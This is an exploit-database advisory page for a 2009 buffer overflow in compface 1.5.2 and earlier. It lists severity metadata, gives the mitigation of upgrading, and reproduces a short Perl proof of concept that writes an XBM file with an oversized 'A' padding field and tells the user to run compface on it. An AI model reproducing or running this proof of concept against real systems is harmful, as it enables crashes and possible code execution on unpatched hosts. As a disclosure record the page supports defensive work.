compface - exploit.company

vendor:

compface

by:

metalhoney

7,5

CVSS

HIGH

Buffer Overflow

120

CWE

Product Name: compface

Affected Version From: 1.5.2 and earlier

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Debian and Ubuntu

2009

compface <= 1.5.2 bufer overflow p o c

A buffer overflow vulnerability exists in compface version 1.5.2 and earlier. The vulnerability is triggered when a specially crafted XBM file is processed by the application. This can be exploited to execute arbitrary code by an attacker.

Mitigation:

Upgrade to the latest version of compface.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################
# compface <= 1.5.2 bufer overflow p o c
# vuln only excist on debian and ubuntu? - packages.debian.org/compface -
# author: metalhoney ------- metalhoney1@hotmail.com -------
#########################################################################
open(ISLAM,">allah.xbm") or die;
print ISLAM "#define noname_width 48\n#define noname_height 48\n";
print ISLAM "static ";
print ISLAM "A"x184;
print ISLAM " char = {\n";
close(ISLAM) or die;
print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n";
#########################################################################
####VIVA#ISLAM##################################################ALLAH####
#########################################################################

# milw0rm.com [2009-06-17]